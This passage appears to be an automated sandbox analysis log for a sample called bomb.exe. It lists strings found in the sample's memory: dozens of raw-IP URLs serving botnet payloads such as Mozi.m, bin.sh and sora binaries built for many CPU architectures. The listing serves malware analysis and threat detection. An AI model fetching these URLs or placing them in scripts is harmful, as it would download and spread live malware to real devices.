Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.208.29.24:35004/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.209.39.163:51334/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.209.43.234:48844/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.209.45.150:60391/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.210.182.106:46567/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.210.188.15:43098/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.212.164.77:32887/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.213.246.167:43141/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.213.250.246:54471/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.213.254.145:53355/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.213.87.107:35841/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.213.87.107:35841/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.214.11.32:39055/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.216.154.249:54942/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.216.154.249:54942/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.216.22.133:36644/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.216.22.133:36644/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.219.115.208:59044/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.219.115.208:59044/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.219.135.221:37901/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.219.135.57:41131/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.219.135.57:41131/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.219.182.209:43135/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.219.35.166:40485/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.219.85.209:44270/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.220.149.27:54988/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.220.149.27:54988/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.221.127.174:44347/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.221.127.174:44347/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.221.202.222:50532/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.221.202.222:50532/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.221.247.105:46631/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.221.254.141:38701/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.221.254.141:38701/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.222.250.149:37038/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.223.2.217:38441/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.223.3.79:45392/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.223.3.79:45392/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.223.4.10:37954/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.223.4.143:57025/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.223.6.101:53153/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.235.116.205:51552/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.235.124.41:34700/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.235.124.41:34700/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.235.124.41:34700/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.235.125.3:33822/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.235.125.3:33822/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.235.125.59:36453/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.235.241.243:56887/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.235.36.148:39942/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.235.37.136:58226/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.235.73.178:32784/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.235.73.178:32784/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.242.207.164:39603/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.242.207.164:39603/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.242.237.43:57568/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.242.237.43:57568/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.245.212.236:47981/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.245.33.109:51163/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.245.33.77:33060/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.245.47.171:41392/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.245.47.171:41392/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.245.47.194:57104/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.245.47.194:57104/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.247.24.210:56046/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.248.163.153:48172/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.248.165.228:46738/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.248.166.156:51847/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.248.166.233:36921/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.248.170.114:51440/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.248.170.114:51440/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.248.170.35:43845/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.248.171.200:44480/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.248.175.16:48602/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.251.160.44:57382/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.252.42.17:37567/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.253.12.207:56980/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.253.213.30:48030/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.253.213.30:48030/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.253.52.117:40491/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.254.96.6:45585/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.255.101.150:60965/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.255.109.168:39313/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.255.159.23:45334/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.255.20.123:34448/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.255.20.123:34448/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.255.96.106:35990/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.255.98.210:36914/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.255.98.210:36914/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.82.78.127:52283/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://119.109.179.254:44315/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://119.109.179.254:44315/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://119.115.74.202:43741/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://119.189.236.119:36114/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://120.57.71.222:54017/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://120.61.197.74:33683/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://120.61.200.120:39344/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://120.61.206.162:43790/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://120.61.79.44:58550/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://120.61.79.44:58550/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://120.61.91.208:47688/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://120.61.91.208:47688/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://123.10.209.134:41906/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://123.10.33.124:32812/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://123.12.244.96:36355/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://123.14.144.43:42566/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://123.14.156.147:40305/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://123.156.8.212:57425/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://123.156.8.212:57425/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://123.175.100.78:38620/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://123.189.205.33:48965/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://123.190.132.14:46091/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://123.190.253.103:35867/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://123.4.11.234:56435/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://123.9.111.1:35694/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://123.9.111.1:35694/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://123.9.87.73:49932/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://124.234.205.38:55145/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://125.25.183.161:34594/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://125.44.21.108:52901/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://152.89.170.242/c.x86
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/arm5
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/arm6
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/arm7
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/bins/sora.arm
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/bins/sora.arm5
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/bins/sora.arm6
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/bins/sora.arm7
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/bins/sora.m68k
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/bins/sora.mips
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/bins/sora.mpsl
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/bins/sora.ppc
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/bins/sora.sh4
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/bins/sora.spc
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/bins/sora.x86
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/c.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/m68k
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/mpsl
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/ppc
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/sh4
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/spc
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/w.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/wget.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://160.119.156.211:41661/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://160.119.156.211:41661/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://160.119.156.230:46576/Mozi.a
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://160.30.38.8:52035/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://175.107.1.96:41644/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://175.146.153.157:55750/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://175.147.253.218:51369/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://175.147.253.218:51369/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://175.151.120.144:57546/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://175.165.135.84:50293/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://175.173.216.196:38660/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://176.36.148.87:47900/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://176.36.148.87:47900/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://176.36.148.87:47900/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://176.74.106.185:44054/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.112.30.208:37291/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.112.54.184:57021/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.113.195.166:32901/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.113.205.3:48170/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.117.126.151:57077/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.117.126.151:57077/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.119.181.181:39311/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.119.181.181:39311/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.120.54.194:59179/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.120.54.194:59179/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.121.133.112:47413/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.121.190.184:34161/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.121.253.49:36475/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.121.85.67:42934/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.126.126.204:50076/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.126.243.151:36485/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.126.245.11:35557/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.126.245.11:35557/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.127.110.253:44237/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.127.113.67:39674/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.127.178.63:41212/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.127.178.63:41212/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.127.214.31:52275/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.56.170.133:47770/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://182.58.7.36:54558/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://186.90.104.124:36131/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://186.90.117.218:35047/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.210.150.19/pGaLoXAcVsGVcfk225.bin
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.210.150.19/zrZdDatYXWH28.bin
